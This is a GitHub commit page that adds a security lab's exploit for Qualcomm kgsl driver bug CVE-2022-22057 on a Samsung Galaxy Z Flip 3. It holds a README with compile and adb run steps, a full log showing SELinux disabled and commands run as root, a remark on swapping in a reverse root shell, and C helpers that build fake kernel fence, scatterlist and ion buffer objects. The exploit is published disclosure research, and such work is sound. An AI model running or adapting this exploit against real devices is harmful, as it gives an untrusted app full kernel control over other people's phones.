8000 Initial commit · github/securitylab@faaa312 · GitHub
[go: up one dir, main page]

Skip to content

Commit faaa312

Browse files
committed
Initial commit
1 parent d74e9de commit faaa312

16 files changed

+2244
-0
lines changed
Lines changed: 87 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,87 @@
1+
## Exploit for Qualcomm CVE-2022-22057
2+
3+
The write up can be found [here](https://github.blog/2022-06-16-the-android-kernel-mitigations-obstacle-race/). This is a bug in the Qualcomm kgsl driver that I reported in November 2021. The bug can be used to gain arbitrary kernel memory read and write from the untrusted app domain, which is then used to disable SELinux and gain root.
4+
5+
The exploit is tested on the Samsung Galaxy Z Flip 3 (European version SM-F711B) with firmware version F711BXXS2BUL6, Baseband F711BXXU2BUL4 and Kernel version 5.4.86-qgki-23063627-abF711BXXS2BUL6 (EUX region). The offsets in the exploit refer to that version of the firmware. Apart from the usual offsets in the kernel image, various addresses of the ion memory pools in `ion_utils.c` are also firmware specific. For reference, I used the following command to compile with clang in ndk-21:
6+
7+
```
8+
android-ndk-r21d-linux-x86_64/android-ndk-r21d/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android30-clang -O2 timeline_wait.c sendmsg_spray.c signalfd_spray.c cpu_utils.c ion_utils.c fake_obj_util.c work_queue_utils.c -o timeline
9+
```
10+
11+
The exploit is reasonably reliable (~70% on tested device), although it does need to wait a few minutes after start up before running, as there are way too many broken/failed binder calls during the first few minutes of start up. (Not entirely sure whether it is a Qualcomm or Samsung problem)
12+
13+
To test, cross compile the file and then execute with `adb`:
14+
15+
```
16+
adb push timeline /data/local/tmp
17+
adb shell
18+
b2q:/ $ /data/local/tmp/timeline
19+
```
20+
21+
If successful, it will disable SELinux, run the `id` command as root, and write the results to the `/data/local/tmp/id.txt` file:
22+
23+
```
24+
b2q:/ $ /data/local/tmp/timeline
25+
heap_id_mask 40
26+
ion region 0x75a0ccf000
27+
region start addr: ffffff8071800000
28+
fence kernel addr: ffffff8071fe0040 192
29+
created fake slab at ffffff8071840100
30+
[+] reallocation data initialized!
31+
[ ] initializing reallocation threads, please wait...
32+
[+] 40 reallocation threads ready!
33+
timeline_wait start
34+
readpipe start
35+
destroy start
36+
readpipe
37+
Caught signal: 10
38+
wait complete -1
39+
readpipe finished
40+
destroy finished
41+
cb_list ffffffc02d943bf8 temp ffffffc02d943c48
42+
mask 52424242 60
43+
cpu_id 0
44+
interval number 1
45+
mask 7f8e7bfeff 7
46+
thread number 0 7 20014
47+
thread batch number 0
48+
new mask 7f8e7bfeff ffffff8071840100
49+
region_offset 40100
50+
sprayed 1024 ion buffer
51+
start searching for buffer
52+
Found 7 ion regions
53+
heap_ops ffffffc012e17180, kernel base: a00b8000
54+
set enforcing to permissive
55+
[+] successfully overwritten selinux_enforcing
56+
wq_ptr_addr: ffffffc012dc2518
57+
wq_addr: ffffff81f4cf1200
58+
pwq_addr ffffff81e24ea100
59+
pool_addr ffffff805ff7c000
60+
worklist ffffff805ff7c020 ffffff805ff7c020
61+
queue work
62+
max_active 256 nr_active 0
63+
queuing work, waiting to aquire spin lock
64+
work_queued
65+
work processed
66+
complete 0
67+
ret 0
68+
nr_active 0
69+
worklist ffffff805ff7c020
70+
work next ffffff8071842c08
71+
[+] successfully run command and added id.txt in /data/local/tmp
72+
finished queue work
73+
freeing ion dma fd
74+
finished freeing ion dma fd
75+
finished spraying
76+
finished
77+
```
78+
There is a long pause after `wait complete -1` is printed, which should be less than a minute, this is normal. It can sometimes also take a while to queue the work (after `queuing work, waiting to aquire spin lock` is printed, can be a couple of minutes, just need to be patient, although that is not common). The exploit normally completes in a couple of minutes.
79+
80+
The file `/data/local/tmp/id.txt` should confirm that the command was run as root:
81+
82+
```
83+
b2q:/ $ cat /data/local/tmp/id.txt
84+
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
85+
```
86+
87+
A different command can be run by changing the variable `cmd` in `setup_sub_info` in `work_queue_utils.c`. (For example, to pop a reverse root shell).
Lines changed: 38 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,38 @@
1+
#ifndef ADDR_UTILS
#define ADDR_UTILS

/* Self-containment fix: this header uses uint64_t and the err(3) family
 * but previously included nothing. */
#include <err.h>
#include <stdint.h>

/* All constants below are specific to the SM-F711B / F711BXXS2BUL6
 * firmware (see README); 64-bit arithmetic deliberately wraps mod 2^64. */

/* Offset between a linear-map ("low mem") kernel virtual address and the
 * physical address it maps. */
#define PHYS_TO_VIRT_OFF 0x8080000000ul

/* Base of the vmemmap (the kernel's struct-page array). */
#define VMEMMAP 0xfffffffefde00000ul

/* Physical load address of the kernel image. */
#define KERNEL_PBASE 0xa0080000

/* Kernel virtual address of the kernel image (_text). */
#define KERNEL_VBASE 0xffffffc010080000ul

//_text - kernel physical base
#define KERNEL_PHYS_OFF (KERNEL_VBASE - KERNEL_PBASE)

/* Round an address down to its 4K page boundary. */
static inline uint64_t page_align(uint64_t x) {
    return (x >> 12) << 12;
}

/* Physical address -> linear-map kernel virtual address. */
static inline uint64_t phys_to_virt(uint64_t x) {
    return (uint64_t)(x) - PHYS_TO_VIRT_OFF;
}

/* Linear-map virtual address -> physical address; aborts on an address
 * that is not in the linear map (bit 38 set).
 * errx, not err: this is a logic error, errno carries nothing useful. */
static inline uint64_t virt_to_phys_lm(uint64_t x) {
    if (x & (1ul << 38)) errx(1, "address is not in low mem range.");
    return x + PHYS_TO_VIRT_OFF;
}

/* Virtual -> physical for both kernel-image addresses (bit 38 set,
 * subtract the image offset) and linear-map addresses. */
static inline uint64_t virt_to_phys(uint64_t x) {
    if (x & (1ul << 38)) return x - (KERNEL_VBASE - KERNEL_PBASE);
    return x + PHYS_TO_VIRT_OFF;
}

/* Physical address -> address of its struct page inside the vmemmap. */
static inline uint64_t phys_to_page(uint64_t phys_addr) {
    //VMEMMAP interpreted as page pointer, so pfn needs to multiply by sizeof(struct page)
    return (phys_addr >> 12) * 64 + VMEMMAP;
}

#endif
Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
#include <sys/syscall.h>
2+
#include <err.h>
3+
#include <errno.h>
4+
#include <stdio.h>
5+
#include <stdlib.h>
6+
#include <sched.h>
7+
#include <unistd.h>
8+
#include <string.h>
9+
10+
#include "cpu_utils.h"
11+
12+
/* Minimal hand-rolled CPU-affinity mask: the libc on the target does not
 * reliably expose cpu_set_t/CPU_SET for this build configuration, so the
 * exploit carries its own.  #undef first so we never trip a macro
 * redefinition diagnostic when <sched.h> does provide them.
 * NOTE(review): if the libc also typedefs cpu_set_t in this configuration
 * the typedef below would clash -- confirm against the target NDK headers. */
#undef CPU_SETSIZE
#undef CPU_SET
#undef CPU_ZERO

#define CPU_SETSIZE 1024
#define __NCPUBITS (8 * sizeof (unsigned long))
typedef struct
{
    unsigned long __bits[CPU_SETSIZE / __NCPUBITS];
} cpu_set_t;

/* Set bit `cpu` in the affinity mask. */
#define CPU_SET(cpu, cpusetp) \
    ((cpusetp)->__bits[(cpu)/__NCPUBITS] |= (1UL << ((cpu) % __NCPUBITS)))
/* Clear the whole affinity mask. */
#define CPU_ZERO(cpusetp) \
    memset((cpusetp), 0, sizeof(cpu_set_t))
23+
24+
int migrate_to_cpu(int i)
25+
{
26+
int syscallres;
27+
pid_t pid = gettid();
28+
cpu_set_t cpu;
29+
CPU_ZERO(&cpu);
30+
CPU_SET(i, &cpu);
31+
32+
syscallres = syscall(__NR_sched_setaffinity, pid, sizeof(cpu), &cpu);
33+
if (syscallres)
34+
{
35+
return -1;
36+
}
37+
return 0;
38+
}
39+
40+
/*
 * Probe whether this thread can be migrated onto CPUs 4 and 5 (presumably
 * the cluster the exploit needs -- see callers).  Returns the first of the
 * two CPUs that the thread could NOT migrate to, or -1 when both
 * migrations succeeded.
 */
int check_cpu_affinity() {
    for (int cpu = 4; cpu <= 5; cpu++) {
        if (migrate_to_cpu(cpu) == -1) {
            return cpu;
        }
    }
    return -1;
}
45+
Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
#ifndef CPU_UTILS
#define CPU_UTILS

/* Pin the calling thread to CPU i; returns 0 on success, -1 on failure. */
int migrate_to_cpu(int i);

/* Returns the first of CPUs 4/5 that the calling thread cannot migrate
 * to, or -1 when both migrations succeed.
 * Fix: `()` (obsolescent, unspecified parameters) -> `(void)` prototype. */
int check_cpu_affinity(void);

#endif
Lines changed: 120 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,120 @@
1+
#include "fake_obj_util.h"
2+
#include "addr_utils.h"
3+
4+
// Delta between the kernel virtual address of the shared region and our
// userspace mapping of it (kernel_vaddr - user_ptr).  Set by fill_ion_heap.
static uint64_t vaddr_offset = 0;

// Translate a pointer inside our mapping into the kernel virtual address
// the kernel will see for the same memory.
static inline uint64_t get_vaddr(struct list_head* ptr) {
    return (uint64_t)ptr + vaddr_offset;
}

// Like the kernel's INIT_LIST_HEAD, except the stored links are kernel
// virtual addresses (uint64_t), not user pointers, so the list is
// self-consistent from the kernel's point of view.
static void init_list_head(struct list_head *list)
{
    list->next = get_vaddr(list);
    list->prev = get_vaddr(list);
}

// Link `new` between `prev` and `start` (i.e. append just before `start`,
// the list head).  All four link writes use kernel virtual addresses.
static void list_add(struct list_head *new, struct list_head *prev,
        struct list_head * start)
{
    start->prev = get_vaddr(new);
    new->next = get_vaddr(start);
    new->prev = get_vaddr(prev);
    prev->next = get_vaddr(new);
}
24+
25+
/*
 * Zero ZERO_FILL_SZ bytes at region+offset -- this area is later used as
 * the fake fences' all-NULL dma_fence ops table (see init_fence).
 * Returns the offset just past the zeroed area.
 */
static uint64_t add_zero_filled_area(void* region, size_t offset) {
    uint8_t *dst = (uint8_t *)region + offset;
    memset(dst, 0, ZERO_FILL_SZ);
    return offset + ZERO_FILL_SZ;
}
29+
30+
static struct list_head* get_list(struct kgsl_timeline_fence* fence) {
31+
return &fence->node;
32+
}
33+
34+
static void init_fence(struct kgsl_timeline_fence* fence, uint64_t zero_fill_addr, int check) {
35+
struct dma_fence* base = &fence->base;
36+
base->flags = 0;
37+
base->refcount = 0;
38+
if (check) {
39+
base->cb_list.next = 0x41414141;
40+
base->cb_list.prev = 0x42424242;
41+
42+
} else {
43+
init_list_head(&base->cb_list);
44+
}
45+
base->ops = zero_fill_addr;
46+
}
47+
48+
/*
 * Lay out `chain_size` fake kgsl_timeline_fence objects in `region`, one
 * per 128-byte slot starting at `offset`, linked into a circular list via
 * their node fields (links are kernel virtual addresses).  Every fence
 * uses `zero_fill_addr` as its ops table.  Returns the offset one past
 * the last fence written.
 *
 * Fix: the original if/else on the last chain element executed identical
 * code in both branches (dead conditional), and `prev` was assigned but
 * never read; both removed with no behavior change.
 */
static uint64_t create_fake_fences(void* region, uint64_t offset, uint64_t chain_size, uint64_t zero_fill_addr) {
    struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)(region + offset);
    struct list_head* start_list = get_list(start);
    struct list_head* prev_list = start_list;
    init_list_head(start_list);
    init_fence(start, zero_fill_addr, 0);
    offset += 128;  /* one fence per 128-byte slot; size checked by caller */
    for (uint64_t i = 1; i < chain_size; i++) {
        struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)(region + offset);
        struct list_head* curr_list = get_list(curr);
        init_list_head(curr_list);
        init_fence(curr, zero_fill_addr, 0);
        list_add(curr_list, prev_list, start_list);
        prev_list = curr_list;
        offset += 128;
    }
    return offset;
}
72+
73+
/*
 * Populate the mapped ion region with a centred chain of fake fences,
 * preceded by a zero-filled area used as their ops table.
 * `region` is our userspace mapping, `region_vaddr` its kernel virtual
 * address; `chain_size` is the number of 128-byte fence slots.
 * Returns the offset (relative to region) of the first fake fence.
 * Also records the user->kernel address delta in `vaddr_offset` for the
 * list helpers.
 *
 * Fix: err() -> errx() -- these are pure logic errors, so appending
 * strerror(errno) printed a stale, misleading message (err also adds its
 * own newline, making the embedded "\n" redundant).  The confusing dead
 * store of create_fake_fences' return into `offset` is dropped.
 */
uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr) {
    if (sizeof(struct kgsl_timeline_fence) > 128) errx(1, "kgsl_timeline_fence too big");
    if (chain_size < 2) errx(1, "chain size should be greater than 1.");
    uint64_t fake_size = chain_size * 128 + ZERO_FILL_SZ;
    if (fake_size > region_size) errx(1, "chain of fake objects does not fit into region.");
    /* Centre the fake objects within the region. */
    uint64_t offset = (region_size - fake_size) / 2;
    vaddr_offset = region_vaddr - (uint64_t)region;
    uint64_t zero_fill_addr = region_vaddr + offset;  /* kernel vaddr of the ops area */
    offset = add_zero_filled_area(region, offset);
    create_fake_fences(region, offset, chain_size, zero_fill_addr);
    return offset;  /* start of the first fake fence */
}
86+
87+
/*
 * Poll the first fake fence for a kernel-written pointer in its cb_list.
 * `fence_start` points at the fake fence in our shared mapping,
 * `fence_kstart` is that fence's kernel virtual address, `chain_size` the
 * number of 128-byte fence slots.
 *
 * When cb_list.prev points beyond the end of the fake-fence chain, the
 * kernel has linked a callback into the list (NOTE(review): presumably
 * the dma_fence_cb living on a kernel stack -- confirm against the
 * writeup).  In that case this redirects node.next to prev + STACK_OFFSET,
 * clears the refcount, sets flags to 1 and returns the captured kernel
 * pointer.  Returns 0 while nothing has been caught.  Statement order is
 * significant: this races with the kernel writing the same object.
 */
uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t fence_kstart) {
    struct kgsl_timeline_fence* start = (struct kgsl_timeline_fence*)fence_start;
    struct kgsl_timeline_fence* curr = (struct kgsl_timeline_fence*)fence_start;
    struct dma_fence* base = &curr->base;
    // Keep flags clear while polling so the fence still looks unsignalled.
    base->flags = 0;
    struct list_head* cb_list = &base->cb_list;
    // Any prev past the chain's end must be a kernel-written address.
    if (cb_list->prev > (fence_kstart + chain_size * 128)) {
        struct list_head* node = get_list(curr);
        node->next = cb_list->prev + STACK_OFFSET;
        base->refcount = 0;
        base->flags = 1;
        return cb_list->prev;
    }
    return 0;
}
102+
103+
/*
 * Build a single-entry fake sg_table in `table_region` describing `len`
 * bytes of physical memory at `phys_addr`.  `table_vaddr` is the kernel
 * virtual address of `table_region`; the scatterlist entry is placed 128
 * bytes after the table header, and sgl stores its kernel address.
 */
void create_fake_sgtable(uint8_t* table_region, uint64_t table_vaddr, uint64_t phys_addr, size_t len) {
    struct sg_table* table = (struct sg_table*)table_region;
    struct scatterlist* entry = (struct scatterlist*)(table_region + 128);

    table->sgl = (struct scatterlist*)(table_vaddr + 128);
    table->nents = 1;
    table->orig_nents = 1;

    /* Low bits 0x2 on page_link -- presumably the scatterlist end marker;
     * the value is the struct page address of phys_addr. */
    entry->page_link = phys_to_page(phys_addr) | 0x2ul;
    entry->length = len;
    entry->offset = 0;
}
114+
115+
/*
 * Point an ion_buffer at a freshly built fake sg_table covering `size`
 * bytes at the page containing `phys_addr`.  `table_region` is our
 * mapping of the table memory, `table_vaddr` its kernel virtual address.
 */
void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size) {
    create_fake_sgtable(table_region, table_vaddr, page_align(phys_addr), size);
    buffer->sg_table = (struct sg_table*)table_vaddr;
    buffer->size = size;
}
120+
Lines changed: 92 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,92 @@
1+
#ifndef FAKE_OBJ_UTIL
#define FAKE_OBJ_UTIL

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>  /* fix: uint64_t/uint32_t/int64_t were used without this */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Size of the zeroed area used as the fake fences' all-NULL ops table. */
#define ZERO_FILL_SZ 128

/* Added to a captured kernel (stack) pointer by poll_list_addr. */
#define STACK_OFFSET 0x50

//offset of node in kgsl_timeline_fence
#define NODE_OFF 0x48

/* Userspace mirror of the kernel's struct list_head.  next/prev hold
 * kernel virtual addresses, hence raw uint64_t rather than pointers. */
struct list_head {
    uint64_t next, prev;
};

typedef struct {
    int counter;
} atomic_t;

typedef struct refcount_struct {
    atomic_t refs;
} refcount_t;

struct kref {
    refcount_t refcount;
};

/* Layout mirror of the kernel's struct dma_fence for this firmware
 * (arm64, 5.4 kernel).  Field offsets must match the kernel exactly. */
struct dma_fence {
    void *lock;
    uint64_t ops;
    union {
        struct list_head cb_list;
        int64_t timestamp;
    };
    uint64_t context;
    uint64_t seqno;
    unsigned long flags;
    uint32_t refcount;
    int error;
};

/* Mirror of the kgsl driver's timeline fence; node must be at NODE_OFF. */
struct kgsl_timeline_fence {
    struct dma_fence base;
    void *timeline;
    struct list_head node;
};

struct scatterlist {
    unsigned long page_link;
    unsigned int offset;
    unsigned int length;
    uint64_t dma_address;
    unsigned int dma_length;
};

struct sg_table {
    struct scatterlist *sgl; /* the list */
    unsigned int nents; /* number of mapped entries */
    unsigned int orig_nents; /* original size of list */
};

/* Mirror of the kernel's struct ion_buffer (lock opaque, sized 32). */
struct ion_buffer {
    struct list_head list;
    void *heap;
    unsigned long flags;
    unsigned long private_flags;
    size_t size;
    void *priv_virt;
    uint8_t lock[32];
    int kmap_cnt;
    void *vaddr;
    struct sg_table *sg_table;
    struct list_head attachments;
};

/* Build the zero area + fake fence chain inside the mapped region;
 * returns the offset of the first fake fence. */
uint64_t fill_ion_heap(void* region, size_t chain_size, size_t region_size, uint64_t region_vaddr);

/* Poll for a kernel-written cb_list pointer; returns it, or 0.
 * Fix: parameter renamed from region_vaddr to fence_kstart to match the
 * definition -- it is the fence's kernel address, not the region base. */
uint64_t poll_list_addr(void* fence_start, size_t chain_size, uint64_t fence_kstart);

/* NOTE(review): no definition of fake_ion_heap is visible in this file's
 * translation unit -- confirm it exists elsewhere or drop the declaration. */
void fake_ion_heap(void* region);

/* Point `buffer` at a fake sg_table built in table_region/table_vaddr. */
void patch_ion_buffer(struct ion_buffer* buffer, uint64_t table_vaddr, uint8_t* table_region, uint64_t phys_addr, size_t size);

#endif

0 commit comments

Comments
 (0)
0